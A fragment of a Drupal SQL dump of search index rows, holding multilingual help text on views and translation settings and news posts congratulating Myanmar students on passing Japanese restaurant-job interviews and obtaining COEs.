(89, 'ko', 'help_search', ' adding a bulk operations form to a view goal add one or more existing actions as bulk operations to an existing tablestyle view if you have the core actions ui module installed see the related topic configuring actions for more information about actions who can edit views  the core views ui module will need to be installed and you will need administer views permission in order to edit a view steps in the manage administrative menu navigate to structure    뷰   a list of all views is shown find the view that you would like to edit and click edit from the dropdown button note that bulk operations work best in a view with a page display and a table format if there is not already an operations bulk form in the fields list for the view click add in the fields section to add it the exact name of the bulk form field will vary and may contain keywords like bulk update form element or operations not to be confused with operations links  which are applied to each item in a row if the bulk operations field already exists click the field name to edit its settings check the action s you want to make available in the selected actions list and click apply all displays   verify that the access settings for the view are at least as restrictive as the permissions necessary to perform the bulk operations people with permission to see the view but who don t have permission to do the bulk operations will experience problems click save  the action s will be available as bulk operations in the view  ', 1787923659),
(90, 'en', 'help_search', ' creating a new view goal create a new view to list content or other items on your site steps in the manage administrative menu navigate to structure   views  click add view  in the view name field enter a name for the view which is how it will be listed in the administrative interface in view settings   show  select the base data type to display in your view this cannot be changed later optionally select or enter filtering sorting and page block display settings these can be added or changed later click save and edit  your view will be created edit it following the steps in the related topics below  ', 1787923659),
(90, 'en', 'node_search', ' congratulations to chaw chit kyaw  congratulations to chaw chit kyaw admin tue 6252024 1718 mon 6242024 2100 congratulations  congratulations to chaw kyit kyaw in passing the interview for tokutei gaishoku restaurant  ', 0),
(90, 'ja', 'help_search', ' creating a new view goal create a new view to list content or other items on your site steps in the manage administrative menu navigate to structure    ビュー   click add view  in the view name field enter a name for the view which is how it will be listed in the administrative interface in view settings   show  select the base data type to display in your view this cannot be changed later optionally select or enter filtering sorting and page block display settings these can be added or changed later click save and edit  your view will be created edit it following the steps in the related topics below  ', 1787923659),
(90, 'ja', 'node_search', ' chaw chit kyaw おめで めでと でとう とうご うござ ござい ざいま います  chaw chit kyaw おめで めでと でとう とうご うござ ござい ざいま います admin tue 6252024 1737 mon 6242024 2100  おめで めでと でとう とうご うござ ござい ざいま います   特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した chaw kyit kyaw さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(90, 'ko', 'help_search', ' creating a new view goal create a new view to list content or other items on your site steps in the manage administrative menu navigate to structure    뷰   click add view  in the view name field enter a name for the view which is how it will be listed in the administrative interface in view settings   show  select the base data type to display in your view this cannot be changed later optionally select or enter filtering sorting and page block display settings these can be added or changed later click save and edit  your view will be created edit it following the steps in the related topics below  ', 1787923659),
(91, 'en', 'help_search', ' editing an existing view display goal edit an existing view display to modify what data is displayed or how it is displayed steps if you are not already editing your view in the manage administrative menu navigate to structure   views  find the view you want to edit and click its edit link under displays  click the display you want to edit find the section whose settings you want to change such as format or filter criteria  see managing content listings views for more information for sections containing lists such as fields and filter criteria  to modify or delete an existing item click the name of the item to add a new item click add in the dropdown list to change the order of items click rearrange in the dropdown list for sections containing individual settings such as title and format  there are often two links for each setting the first link shows the current value click that link to change the value if there is a second link called settings  click that link to change the settings details for example if your format is currently shown as unformatted list  click unformatted list to switch to using a grid or table format click settings next to your format type to change the settings for your chosen format when you have finished changing all the settings verify that the display is correct by clicking update preview  return to editing settings if necessary when you have verified the display click save  alternatively if you have made mistakes and want to discard your changes click cancel  additional resources creating listings with views drupal user guide  ', 1787923659),
(91, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1737 thu 5232024 942 congratulations  congratulations hnin ei phyu ei shwe zin aung zin oo for getting coe congratulations hnin ei phyu and ei shwe zin and aung zin oo for getting coe  ', 0),
(91, 'ja', 'help_search', ' editing an existing view display goal edit an existing view display to modify what data is displayed or how it is displayed steps if you are not already editing your view in the manage administrative menu navigate to structure    ビュー   find the view you want to edit and click its edit link under displays  click the display you want to edit find the section whose settings you want to change such as format or filter criteria  see managing content listings views for more information for sections containing lists such as fields and filter criteria  to modify or delete an existing item click the name of the item to add a new item click add in the dropdown list to change the order of items click rearrange in the dropdown list for sections containing individual settings such as title and format  there are often two links for each setting the first link shows the current value click that link to change the value if there is a second link called settings  click that link to change the settings details for example if your format is currently shown as unformatted list  click unformatted list to switch to using a grid or table format click settings next to your format type to change the settings for your chosen format when you have finished changing all the settings verify that the display is correct by clicking update preview  return to editing settings if necessary when you have verified the display click save  alternatively if you have made mistakes and want to discard your changes click cancel  additional resources creating listings with views drupal user guide  ', 1787923659),
(91, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1741 thu 5232024 942  おめで めでと でとう  hnin ei phyu さん ei shwe zin さん aung zin oo さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congratulations hnin ei phyu and ei shwe zin and aung zin oo for getting coe  ', 0),
(91, 'ko', 'help_search', ' editing an existing view display goal edit an existing view display to modify what data is displayed or how it is displayed steps if you are not already editing your view in the manage administrative menu navigate to structure    뷰   find the view you want to edit and click its edit link under displays  click the display you want to edit find the section whose settings you want to change such as format or filter criteria  see managing content listings views for more information for sections containing lists such as fields and filter criteria  to modify or delete an existing item click the name of the item to add a new item click add in the dropdown list to change the order of items click rearrange in the dropdown list for sections containing individual settings such as title and format  there are often two links for each setting the first link shows the current value click that link to change the value if there is a second link called settings  click that link to change the settings details for example if your format is currently shown as unformatted list  click unformatted list to switch to using a grid or table format click settings next to your format type to change the settings for your chosen format when you have finished changing all the settings verify that the display is correct by clicking update preview  return to editing settings if necessary when you have verified the display click save  alternatively if you have made mistakes and want to discard your changes click cancel  additional resources creating listings with views drupal user guide  ', 1787923659),
(92, 'en', 'help_search', ' configuring content language settings and translation goal configure language and translation settings for one or more content entity types see managing content structure for an overview of content entities to do this you must have at least two languages configured afterwards you will have a translate operation available for your content entities either as a tab or link when you are viewing or editing content or on content administration pages steps in the manage administrative menu navigate to configuration   region and language   content language and translation  under custom language settings  find the content entity types that should have customized language settings on your site check the box next to each one a section will appear below the list with settings for that entity type for each entity type you checked in the settings section below check the boxes for each entity subtype that should be translatable on your site if the entity type does not have subtypes there is just one check box for the entity type as a whole for each entity type or subtype select the default language  also if you want to have languages other than the default available when you create content check show language selector on create and edit pages  for each translatable type or subtype look through the list of fields for the type or subtype and verify that only the fields that should be translatable are checked for example you would probably want to translate a title field but you might not want to translate a start date field click save configuration when all of your changes are complete  ', 1787923659),
(92, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1743 mon 5202024 948 congratulations  congratulations ya min thet shin thant phyu for getting coe congratulations yamin thet and shin thant phyu for getting coe  ', 0),
(92, 'ja', 'help_search', ' configuring content language settings and translation goal configure language and translation settings for one or more content entity types see managing content structure for an overview of content entities to do this you must have at least two languages configured afterwards you will have a translate operation available for your content entities either as a tab or link when you are viewing or editing content or on content administration pages steps in the manage administrative menu navigate to configuration   region and language   content language and translation  under custom language settings  find the content entity types that should have customized language settings on your site check the box next to each one a section will appear below the list with settings for that entity type for each entity type you checked in the settings section below check the boxes for each entity subtype that should be translatable on your site if the entity type does not have subtypes there is just one check box for the entity type as a whole for each entity type or subtype select the default language  also if you want to have languages other than the default available when you create content check show language selector on create and edit pages  for each translatable type or subtype look through the list of fields for the type or subtype and verify that only the fields that should be translatable are checked for example you would probably want to translate a title field but you might not want to translate a start date field click save configuration when all of your changes are complete  ', 1787923659),
(92, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1746 mon 5202024 948  おめで めでと でとう  ya min thet さんと shin thant phyu さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congratulations yamin thet and shin thant phyu for getting coe  ', 0),
(92, 'ko', 'help_search', ' configuring content language settings and translation goal configure language and translation settings for one or more content entity types see managing content structure for an overview of content entities to do this you must have at least two languages configured afterwards you will have a translate operation available for your content entities either as a tab or link when you are viewing or editing content or on content administration pages steps in the manage administrative menu navigate to configuration   region and language   content language and translation  under custom language settings  find the content entity types that should have customized language settings on your site check the box next to each one a section will appear below the list with settings for that entity type for each entity type you checked in the settings section below check the boxes for each entity subtype that should be translatable on your site if the entity type does not have subtypes there is just one check box for the entity type as a whole for each entity type or subtype select the default language  also if you want to have languages other than the default available when you create content check show language selector on create and edit pages  for each translatable type or subtype look through the list of fields for the type or subtype and verify that only the fields that should be translatable are checked for example you would probably want to translate a title field but you might not want to translate a start date field click save configuration when all of your changes are complete  ', 1787923659),
(93, 'en', 'help_search', ' managing content listings views  what is a view  a view is a listing of items on your site for example a block showing the most recent comments a page listing news items or a list of registered users the listings can be formatted in a table grid list calendar rss feed and other formats some output formats may require you to install additional contributed modules  what are the components of a view  when you first create a view you will specify what type of base data is being displayed in the view which cannot be changed after choosing a base data type you can edit the following components which allow you to specify which data to output in what order and in what format  displays  whether the output goes to a page block feed etc a single view can have multiple displays each with different settings format  the output style for each display such as content item grid table or html list fields  if the format allows the particular fields to display filter criteria  criteria to limit the data to output such as whether the content is published the type of content etc filters can be exposed to let users choose how to filter the data sort criteria  how to order the data sorting can also be exposed to users page settings   block settings  etc settings specific to the display type such as the url for a page display most display types support an access setting where you can choose a permission or role that a user must have in order to see the view header and footer  content to display at the top or bottom of the view display no results behavior  what to do if the filter criteria result in having no data to display pager  how many items to display and how to paginate if there are additional items to display advanced   contextual filters  like regular filters except the criteria come from the context  such as the current date page the view is displayed on etc advanced   relationships  additional data to pull in and display related in some way to the base data of the view such as data about the user who created the content item  advanced   exposed form  if you have exposed filters or sorts how to display the form to the user what are bulk operations  views using a table display format can include a bulk operations form which allows users with sufficient permission to select one or more items from the view and apply an administrative action to them the bulk actions available are specific to the base data type of the view for example a view of content items could support bulk publishing and unpublishing actions if you have the core actions ui module installed see the related topic configuring actions for more about actions managing views overview the core views module handles the display of views and the core views ui module allows you to create edit and delete views in the administrative interface see the related topics listed below for specific tasks if the views ui module is installed  additional resources creating listings with views drupal user guide  ', 1787923659),
(93, 'en', 'node_search', ' congratulations for getting coe おめで めでと でとう ya min thet さんと shin thant phyu さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  congratulations for getting coe おめで めでと でとう ya min thet さんと shin thant phyu さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います admin tue 6252024 1750 sat 5182024 956 congratulations  congratulations khaing hnin wai ei ei phyo ei ei min nan thae nu soe for getting coe congratulations khaing hnin wai and ei ei phyo and ei ei min and nan thae nu soe for getting coe  ', 0),
(93, 'ja', 'help_search', ' managing content listings views  what is a view  a view is a listing of items on your site for example a block showing the most recent comments a page listing news items or a list of registered users the listings can be formatted in a table grid list calendar rss feed and other formats some output formats may require you to install additional contributed modules  what are the components of a view  when you first create a view you will specify what type of base data is being displayed in the view which cannot be changed after choosing a base data type you can edit the following components which allow you to specify which data to output in what order and in what format  displays  whether the output goes to a page block feed etc a single view can have multiple displays each with different settings format  the output style for each display such as content item grid table or html list fields  if the format allows the particular fields to display filter criteria  criteria to limit the data to output such as whether the content is published the type of content etc filters can be exposed to let users choose how to filter the data sort criteria  how to order the data sorting can also be exposed to users page settings   block settings  etc settings specific to the display type such as the url for a page display most display types support an access setting where you can choose a permission or role that a user must have in order to see the view header and footer  content to display at the top or bottom of the view display no results behavior  what to do if the filter criteria result in having no data to display pager  how many items to display and how to paginate if there are additional items to display advanced   contextual filters  like regular filters except the criteria come from the context  such as the current date page the view is displayed on etc advanced   relationships  additional data to pull in and display related in some way to the base data of the view such as data about the user who created the content item  advanced   exposed form  if you have exposed filters or sorts how to display the form to the user what are bulk operations  views using a table display format can include a bulk operations form which allows users with sufficient permission to select one or more items from the view and apply an administrative action to them the bulk actions available are specific to the base data type of the view for example a view of content items could support bulk publishing and unpublishing actions if you have the core actions ui module installed see the related topic configuring actions for more about actions managing views overview the core views module handles the display of views and the core views ui module allows you to create edit and delete views in the administrative interface see the related topics listed below for specific tasks if the views ui module is installed  additional resources creating listings with views drupal user guide  ', 1787923659),
(93, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1754 sat 5182024 956  おめで めでと でとう  khaing hnin wai ei ei phyo ei ei min nan thae nu soe coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congratulations khaing hnin wai and ei ei phyo and ei ei min and nan thae nu soe for getting coe  ', 0),
(93, 'ko', 'help_search', ' managing content listings views  what is a view  a view is a listing of items on your site for example a block showing the most recent comments a page listing news items or a list of registered users the listings can be formatted in a table grid list calendar rss feed and other formats some output formats may require you to install additional contributed modules  what are the components of a view  when you first create a view you will specify what type of base data is being displayed in the view which cannot be changed after choosing a base data type you can edit the following components which allow you to specify which data to output in what order and in what format  displays  whether the output goes to a page block feed etc a single view can have multiple displays each with different settings format  the output style for each display such as content item grid table or html list fields  if the format allows the particular fields to display filter criteria  criteria to limit the data to output such as whether the content is published the type of content etc filters can be exposed to let users choose how to filter the data sort criteria  how to order the data sorting can also be exposed to users page settings   block settings  etc settings specific to the display type such as the url for a page display most display types support an access setting where you can choose a permission or role that a user must have in order to see the view header and footer  content to display at the top or bottom of the view display no results behavior  what to do if the filter criteria result in having no data to display pager  how many items to display and how to paginate if there are additional items to display advanced   contextual filters  like regular filters except the criteria come from the context  such as the current date page the view is displayed on etc advanced   relationships  additional data to pull in and display related in some way to the base data of the view such as data about the user who created the content item  advanced   exposed form  if you have exposed filters or sorts how to display the form to the user what are bulk operations  views using a table display format can include a bulk operations form which allows users with sufficient permission to select one or more items from the view and apply an administrative action to them the bulk actions available are specific to the base data type of the view for example a view of content items could support bulk publishing and unpublishing actions if you have the core actions ui module installed see the related topic configuring actions for more about actions managing views overview the core views module handles the display of views and the core views ui module allows you to create edit and delete views in the administrative interface see the related topics listed below for specific tasks if the views ui module is installed  additional resources creating listings with views drupal user guide  ', 1787923659),
(94, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1757 sat 5182024 902 congratulations  congratulations nyein ei ei shwe ei ei mon for getting coe congratulations nyein ei ei shwe and ei ei mon for getting coe  ', 0),
(95, 'en', 'node_search', ' activities for 3th batch of onjob training restaurant  activities for 3th batch of onjob training restaurant admin tue 6252024 1738 mon 1082024 900 images for 3th batch students participating in onjob training at yangon s famous restaurants for more experiences to gain  ', 0),
(95, 'ja', 'node_search', ' activities for 2nd batch of onjob training restaurant  activities for 2nd batch of onjob training restaurant admin tue 6252024 1809 mon 1082024 900  さらな らなる なる経 る経験 経験を 験を積 を積む 積むた むため ために めにヤ にヤン ヤンゴ ンゴン ゴンの ンの有 の有名 有名レ 名レス レスト ストラ トラン ランで ンで実 で実務 実務研 務研修 研修に 修に参 に参加 参加す 加する する第 2 バッチ ッチの チの学 の学生 学生た 生たち たちの ちの写 の写真  ', 0),
(96, 'en', 'node_search', ' congralutations for getting coe congralutations for getting coe admin tue 6252024 1808 sat 5182024 900 congratulations  congratulations nyein ei ei shwe ei ei mon for getting coe congralutations nyein ei ei shwe and ei ei mon for getting coe  ', 0),
(96, 'ja', 'node_search', ' congralutations for getting coe congralutations for getting coe admin tue 6252024 1815 sat 5182024 900  おめで めでと でとう とうご うござ ござい ざいま います  nyein ei ei shwe と ei ei mon coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congralutations nyein ei ei shwe and ei ei mon for getting coe  ', 0),
(97, 'en', 'node_search', ' congralutations for getting coe congralutations for getting coe admin tue 6252024 1817 sat 5182024 900 congralutations  congralutations yu yu nway win pyae shan khin khin kyaw hnin thazin aung thet myat myat khaing for getting coe congralutations yu yu nway and win pyae shan and khin khin kyaw and hnin thazin aung and thet myat myat khaing for getting coe  ', 0),
(97, 'ja', 'node_search', ' congralutations for getting coe congralutations for getting coe admin tue 6252024 1825 sat 5182024 900  おめで めでと でとう とうご うござ ござい ざいま います  yu yu nway win pyae shan khin khin kyaw hnin thazin aung thet myat myat khaing coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congralutations yu yu nway and win pyae shan and khin khin kyaw and hnin thazin aung and thet myat myat khaing for getting coe  ', 0),
(98, 'en', 'node_search', ' 2nd batch pratical class for restaurant 2nd batch pratical class for restaurant admin tue 6252024 1817 sat 5182024 900 images of restaurant practical training class for 2nd batch students from new comet you don t have to worry about not getting enough experience for tokutei gaishoku in japan all you have to do is to study hard and passing the interview is the ultimate priority  ', 0),
(98, 'ja', 'node_search', ' 2nd batch pratical class for restaurant 2nd batch pratical class for restaurant admin tue 6252024 1826 sat 5182024 900 new comet 第 2 期生向 生向け 向けレ けレス レスト ストラ トラン ラン実 ン実習 実習授 習授業 授業の 業の様 の様子 様子で 子です   日本で 本で特 で特定 特定外 定外職 外職に 職に就 に就く 就くた くため ために めに十 に十分 十分な 分な経 な経験 経験を 験を積 を積め 積めな めない ないこ いこと ことを とを心 を心配 心配す 配する する必 る必要 必要は 要はあ はあり ありま りませ ません あなた なたが たがす がすべ すべき べきこ きこと ことは とは一 は一生 一生懸 生懸命 懸命勉 命勉強 勉強す 強する するこ ること ことだ とだけ だけで けです そして して面 て面接 面接に 接に合 に合格 合格す 格する するこ ること ことが とが最 が最優 最優先 優先事 先事項 事項で 項です  ', 0),
(99, 'en', 'node_search', ' congralutations for getting coe congralutations for getting coe admin tue 6252024 1827 sat 5182024 900 congralutations  congralutations nan su khaing wut yee aung for getting coe congralutations nan su khaing and wut yee aung for getting coe  ', 0),
(99, 'ja', 'node_search', ' congralutations for getting coe congralutations for getting coe admin tue 6252024 1830 sat 5182024 900  おめで めでと でとう とうご うござ ござい ざいま います  nan su khaing と wut yee aung coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congralutations nan su khaing and wut yee aung for getting coe  ', 0),
(100, 'en', 'node_search', ' congratulations to bo bo zaw  congratulations to bo bo zaw admin wed 6262024 1256 mon 6172024 900 congratulations  congratulations to bo bo zaw for passing the interview in tokutei gaishoku restaurant  ', 0),
(100, 'ja', 'node_search', ' congratulations to bo bo zaw  congratulations to bo bo zaw admin wed 6262024 1301 mon 6172024 900  おめで めでと でとう とうご うござ ござい ざいま います  bo bo zaw さん 特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(101, 'en', 'node_search', ' congratulations for yamin phyo  congratulations for yamin phyo admin wed 6262024 1534 fri 6072024 900 congratulations  congratulations to yamin phyo for passing the interview with tokutei gaishoku restaurant  ', 0),
(101, 'ja', 'node_search', ' congratulations for yamin phyo  congratulations for yamin phyo admin wed 6262024 1544 fri 6072024 900  おめで めでと でとう とうご うござ ござい ざいま います  yamin phyo さん 特定飲 定飲食 飲食店 食店の 店の面 の面接 面接合 接合格 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(102, 'en', 'node_search', ' congrats thae su yati soe  congrats thae su yati soe admin wed 6262024 1547 thu 6062024 900 congratulations  congratulations thae su yati soe on passing the interview with tokutei gaishuku restaurant  ', 0),
(102, 'ja', 'node_search', ' congrats thae su yati soe  congrats thae su yati soe admin wed 6262024 1554 thu 6062024 900  おめで めでと でとう とうご うござ ござい ざいま います  thae su yati soe  さん 特定飲 定飲食 飲食店 食店の 店の面 の面接 面接合 接合格 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(103, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin wed 6262024 1523 sun 2182024 900 congratulations  congratulations kaw myar bue myar shar ei ei nyein lay lay naing nang bwar kyi phray myar thu zar aung hnin wah khine for getting coe congratulations kaw myar and bue myar shar and ei ei nyein and lay lay naing and nang bwar kyi and phray myar and thu zar aung and hnin wah khine for getting coe  ', 0),
(103, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin wed 6262024 1601 sun 2182024 900  おめで めでと でとう とうご うござ ござい ざいま います  kaw myar bue myar shar ei ei nyein lay lay naing nang bwar kyi phray myar thu zar aung hnin wah khine coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います for getting coe congratulations kaw myar and bue myar shar and ei ei nyein and lay lay naing and nang bwar kyi and phray myar and thu zar aung and hnin wah khine for getting coe  ', 0),
(104, 'en', 'node_search', ' congratulations khaing sapal oo  congratulations khaing sapal oo admin wed 6262024 1557 thu 6062024 900 congratulations congratulations khaing sapal oo for passing tokutei gaishoku restaurant  ', 0),
(104, 'ja', 'node_search', ' congratulations khaing sapal oo  congratulations khaing sapal oo admin wed 6262024 1601 thu 6062024 900  おめで めでと でとう とうご うござ ござい ざいま います  khaing sapal oo  さん 特定外 定外食 レスト ストラ トラン 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(105, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin wed 6262024 1606 thu 2152024 900 congratulations  congratulations hnin wai wai nwe thidar khine for getting coe congratulations hnin wai wai and thidar khine for getting coe  ', 0),
(105, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin wed 6262024 1609 thu 2152024 900  おめで めでと でとう  hnin wai wai nwe さんと thidar khine さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congratulations hnin wai wai and thidar khine for getting coe  ', 0),
(106, 'en', 'node_search', ' congrats khaing thaw thaw khant  congrats khaing thaw thaw khant admin wed 6262024 1605 thu 6062024 900 congratulations  congratulations khaing thaw thaw khant for passing tokutei gaishoku restaurant  ', 0),
(106, 'ja', 'node_search', ' congrats khaing thaw thaw khant  congrats khaing thaw thaw khant admin wed 6262024 1619 thu 6062024 900  おめで めでと でとう とうご うござ ござい ざいま います  khaing thaw thaw khant  さん 特定外 定外食 レスト ストラ トラン 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(107, 'en', 'node_search', ' congratulations pyae sone thu  congratulations pyae sone thu admin wed 6262024 1624 wed 5292024 900 congratulations  congratulations pyae sone thu for passing interview in tokutei gaishoku restaurant  ', 0),
(107, 'ja', 'node_search', ' congratulations pyae sone thu  congratulations pyae sone thu admin wed 6262024 1627 wed 5292024 900  おめで めでと でとう とうご うござ ござい ざいま います  pyae sone thu  さん tokutei gaishoku レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(108, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin wed 6262024 1627 mon 4152024 900 congratulations  congratulations than htun naing aung pyae paing ei khin htet wai aung lwin phyo ko ko thae ko ko yu yu nyein for getting coe congratulations than htun naing and aung pyae paing and ei khin and htet wai aung and lwin phyo ko ko and thae ko ko and yu yu nyein for getting coe  ', 0),
(108, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin wed 6262024 1631 mon 4152024 900  おめで めでと でとう とうご うござ ござい ざいま います  than htun naing aung pyae paing ei khin htet wai aung lwin phyo ko ko thae ko ko yu yu nyein の coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congratulations than htun naing and aung pyae paing and ei khin and htet wai aung and lwin phyo ko ko and thae ko ko and yu yu nyein for getting coe  ', 0),
(109, 'en', 'node_search', ' congrats chan myae thu  congrats chan myae thu admin wed 6262024 1631 mon 5202024 900 congratulations  congratulations chan myae thu for passing interview for tokutei gaishoku restaurant  ', 0),
(109, 'ja', 'node_search', ' congrats chan myae thu  congrats chan myae thu admin wed 6262024 1634 mon 5202024 900  おめで めでと でとう とうご うござ ござい ざいま います  chan myae thu  さん tokutei gaishoku レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(110, 'en', 'node_search', ' congratulations yaw chang  congratulations yaw chang admin wed 6262024 1637 mon 5202024 900 congratulations  congratulations yaw chang for passing the interview tokutei gaishoku restaurant  ', 0),
(110, 'ja', 'node_search', ' congratulations yaw chang  congratulations yaw chang admin wed 6262024 1642 mon 5202024 900  おめで めでと でとう とうご うござ ござい ざいま います  yaw chang  さん 特定外 定外食 レスト ストラ トラン 面接合 接合格 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(111, 'en', 'node_search', ' congratulations 1952024  congratulations 1952024 admin wed 6262024 1638 sun 5192024 900 congratulations  congratulations khin khin kyaw thet myat myat khine hnin thazin aung win pyae shan yu yu nway for departure to big city of japan tokyo in 1135am with tokutei gaishoku visawishing for a better opportunity and health in japan congratulations thet myat myat khaing and khin khin kyaw and hnin thazin aung and win pyae shan and yu yu nway for departure to japan  ', 0),
(111, 'ja', 'node_search', ' congratulations 1952024  congratulations 1952024 admin wed 6262024 1650 sun 5192024 900  おめで めでと でとう とうご うござ ござい ざいま います  khin khin kyaw thet myat myat khine hnin thazin aung win pyae shan yu yu nway の皆さ 皆さん 特定外 定外食 外食ビ 食ビザ ビザを ザを取 を取得 取得し 得して 午前 1135 に日本 日本の 本の大 の大都 大都市 東京 へ出発 出発し 発しま します 日本で 本でよ でより より良 り良い 良い機 い機会 機会と 会と健 と健康 健康を 康を祈 を祈っ 祈って ってい ていま います congratulations thet myat myat khaing and khin khin kyaw and hnin thazin aung and win pyae shan and yu yu nway for departure to japan  ', 0),
(112, 'en', 'node_search', ' congrats adin min maw min khant kyaw congrats adin min maw min khant kyaw admin wed 6262024 1654 mon 5202024 900 congratulations  congrats to adin min maw min khant kyaw for passing the job interview with tokutei gaishoku restaurant  ', 0),
(112, 'ja', 'node_search', ' congrats adin min maw min khant kyaw congrats adin min maw min khant kyaw admin wed 6262024 1654 mon 5202024 900  おめで めでと でとう とうご うござ ござい ざいま います  adin min maw  さんと  min khant kyaw  さんが tokutei gaishoku レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(113, 'en', 'node_search', ' congratulations 2952024  congratulations 2952024 admin wed 6262024 1652 wed 5292024 900 congratulations  congratulations lwin phyo ko ko aung pyae paing ei khin yu yu nyein than htun naing htet lin aung thae ko ko for the departure to japanwishing for more success and good health in tokyo congratulations lwin phyo ko ko and aung pyae paing and ei khin and than htun naing and thae ko ko and yu yu nyein and htet lin aung for the departure to japan  ', 0),
(113, 'ja', 'node_search', ' congratulations 2952024  congratulations 2952024 admin wed 6262024 1659 wed 5292024 900  おめで めでと でとう  lwin phyo ko ko aung pyae paing ei khin yu yu nyein than htun naing htet lin aung thae ko ko 日本へ 本への へのご のご出 ご出発 出発お 発おめ おめで めでと でとう とうご うござ ござい ざいま います 東京で 京での でのさ のさら さらな らなる なる成 る成功 成功と 功と健 と健康 健康を 康をお をお祈 お祈り 祈りし りして してい ていま います congratulations lwin phyo ko ko and aung pyae paing and ei khin and than htun naing and thae ko ko and yu yu nyein and htet lin aung for the departure to japan  ', 0),
(114, 'en', 'node_search', ' congrats yu mon aung may myo khaing congrats yu mon aung may myo khaing admin wed 6262024 1656 sun 5192024 900 congratulations  congratulations to yu mon aung may myo khaing for passing the interview in tokutei gaishoku restaurant  ', 0),
(114, 'ja', 'node_search', ' congrats yu mon aung may myo khaing congrats yu mon aung may myo khaing admin wed 6262024 1705 sun 5192024 900  おめで めでと でとう とうご うござ ござい ざいま います  yu mon aung  さんと  may myo khaing  さんが tokutei gaishoku レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(115, 'en', 'node_search', ' congrats li soung oo thandar moe khu richard pyae sone aung congrats li soung oo thandar moe khu richard pyae sone aung admin wed 6262024 1711 wed 5082024 900 congratulations  congratulations li soung oo thandar moe khu richard pyae sone aung for passing the interview for food manufacture work in japan  ', 0),
(115, 'ja', 'node_search', ' congrats li soung oo thandar moe khu richard pyae sone aung congrats li soung oo thandar moe khu richard pyae sone aung admin wed 6262024 1716 wed 5082024 900  おめで めでと でとう とうご うござ ござい ざいま います   おめで めでと でとう とうご うござ ござい ざいま います li soung oo thandar moe khu richard pyae sone aung 日本で 本での での食 の食品 食品製 品製造 製造職 造職の 職の面 の面接 面接に 接に合 に合格 合格し 格しま しまし ました  ', 0),
(116, 'en', 'node_search', ' images of 2th batch resturtant internship images of 2th batch resturtant internship admin wed 6262024 1713 sat 5182024 900 images of 2th batch resturtant internship  internships are a fantastic opportunity to gain handson experience and refine your skills under the guidance of seasoned professionals i am confident that you will make the most of this opportunity and continue to excel in everything you do  ', 0),
(116, 'ja', 'node_search', ' images of 2th batch resturtant internship images of 2th batch resturtant internship admin wed 6262024 1720 sat 5182024 900  第 2 回レス レスト ストラ トラン ランイ ンイン インタ ンター ターン ーンシ ンシッ シップ ップの プのイ のイメ イメー メージ   インタ ンター ターン ーンシ ンシッ シップ ップは 経験豊 験豊か 豊かな かなプ なプロ プロフ ロフェ フェッ ェッシ ッショ ショナ ョナル ナルの ルの指 の指導 指導の 導の下 実践的 践的な 的な経 な経験 経験を 験を積 を積み スキル キルを ルを磨 を磨く 磨く素 く素晴 素晴ら 晴らし らしい しい機 い機会 機会で 会です この機 の機会 機会を 会を最 を最大 最大限 大限に 限に活 に活用 活用し 何事に 事にも にも卓 も卓越 卓越し 越し続 し続け 続ける けるこ ること ことを とを確 を確信 確信し 信して してい ていま います  ', 0),
(117, 'en', 'node_search', ' congrats ei eaindra aung  congrats ei eaindra aung admin wed 6262024 1719 wed 3272024 900 congratulations  congratulations ei eaindra aung for passing interview in tokutei gaishoku restaurant  ', 0),
(117, 'ja', 'node_search', ' congrats ei eaindra aung  congrats ei eaindra aung admin wed 6262024 1721 wed 3272024 900  おめで めでと でとう とうご うござ ござい ざいま います  ei eaindra aung  さん tokutei gaishoku レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(118, 'en', 'node_search', ' congrats aung thura congrats aung thura admin wed 6262024 1722 fri 3222024 900 congratulations  congratulations aung thura for passing tokutei gaishoku restaurant  ', 0),
